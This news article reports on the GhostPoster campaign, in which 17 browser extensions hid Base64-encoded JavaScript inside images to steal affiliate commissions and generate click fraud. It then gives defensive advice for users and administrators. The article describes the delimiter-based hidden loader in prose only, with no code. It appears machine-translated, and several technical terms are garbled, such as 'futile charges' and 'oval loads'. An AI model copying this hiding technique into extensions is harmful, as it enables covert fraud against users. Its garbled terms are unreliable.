GhostPoster: 17 browser extensions hidden malware in images to steal clicks and commissions

The story is repeated with a more sophisticated variant: security researchers have discovered a new set of 17 browser extensions linked to the campaign known as GhostPoster, which in total accumulated about 840,000 facilities before being removed from official stores. The striking is not only the volume, but the technique used by the attackers: a malicious code camouflaged within images and files included in the extensions themselves, with a phased execution flow designed to avoid static and behavioural controls.

The first alarm was given by Koi Security analysts at the end of last year, when they described extensions that hidden malicious JavaScript in icons. This code, once activated, downloaded futile charges from external resources, monitored the navigation activity, manipulated affiliate links on large e-commerce platforms and mounted invisible iframes to generate click and advertising fraud. If you want to see the work of that first finding, you can start with the Koi Security page at koi.security, where they publish investigations and notices about malicious extension campaigns.

A new report from the security platform Browser LayerX confirms that the campaign was not extinguished after the initial exhibition and details the 17 extensions involved in this round, many with names that mimic legitimate functions such as translators, ad blockers or video download tools. LayerX found that some of these supplements have been in official repositories for years, with a documented presence since 2020, suggesting a long-term operation that has been able to stay under radar. You can read the LayerX analysis on your official site at layerx.ai where they explain the technical evolution of GhostPoster.

Among the technical developments highlighted by LayerX is the evolution towards a more robust execution in several phases: in addition to hiding code in icons, the attackers began to pack the malicious load within images included in the extension and to move the logic of preparation to the background script (background script) of the extension itself. In running time, that script reads the raw bytes of the image looking for a specific delimiter (the report mentions a sequence as "> > > >"), extracts the hidden data, stores them temporarily and then decodifies them from Base64 to run them as JavaScript. This mechanism increases latency time before activation and complicates detection by tools that analyze only visible content or the most obvious files.

The purpose of this payload is varied and harmful: persistent monitoring of pages that visit, redirecting or handling affiliate links to steal commissions, and the invisible insertion of iframes that generate fraudulent impressions and clicks. All these actions not only affect the privacy of the victim, but can also cause economic losses to users, businesses and advertising networks. LayerX stresses that the modularity and sigil of the new pattern allow greater sleep and resistance to both static and dynamic filters.

Official platforms have reacted: according to news reports, Mozilla and Microsoft have already removed identified extensions from their stores, and Google confirmed the removal of affected versions of the Chrome Web Store. BleepingComputer covered the withdrawal and communications with Google; its portal is a good reference to follow the outcome and see which specific extensions were removed: bleepingcomputer.com. Still, removing an extension from the store does not eliminate its presence in the browsers of those who already installed it, so the risk persists between users with previous facilities.

If you are concerned about installing any of these extensions or any other strange behavior in the browser, there are concrete and useful actions that you can take immediately. First, check the list of installed extensions and remove any additions you do not recognize or need. The browsers offer extension management pages with step-by-step guides: for Chrome check Google's help in support.google.com, for Firefox Mozilla documentation in support.mozilla.org and for Edge the Microsoft instructions in support.microsoft.com. After removing the extension, it is recommended to delete local data linked to extensions (if the browser allows), clean cache and cookies, and, if you suspect that sensitive data could be compromised, rotate passwords and review access associated with important accounts.

In more serious scenarios, it is also appropriate to run an updated anti-malware analysis, review transactions and unusual activity in services linked to your navigation (online accounts, affiliate programs, etc.), and, if the extension had extensive permissions, consider creating a new browser profile or even migrating data to a clean installation to avoid persistent remains. Teams and administrators should audit the extensions installed on corporate devices, force policies that limit the installation to only verified supplements and monitor network logs in search of suspicious domain communications used to download oval loads.

The GhostPoster case highlights two important lessons: on the one hand, the desirability of not lowering the guard to seemingly harmless extensions - a translator or an image download can become attack vectors - and on the other, the need for continuous improvements in the surveillance of the extension stores and in the defenses that detect code hidden in binary and images. If you want to deepen the modus operandi and technical recommendations, the public reports of Koi Security and LayerX are a good starting point, and specialized media such as BleepingComputer provide follow-up to the mediation in the shops.

The final invitation is simple: Check your extensions calmly, remove the unnecessary and keep your browser up to date. The extensions make life easier for us, but they also open an entrance door if we do not manage them with caution.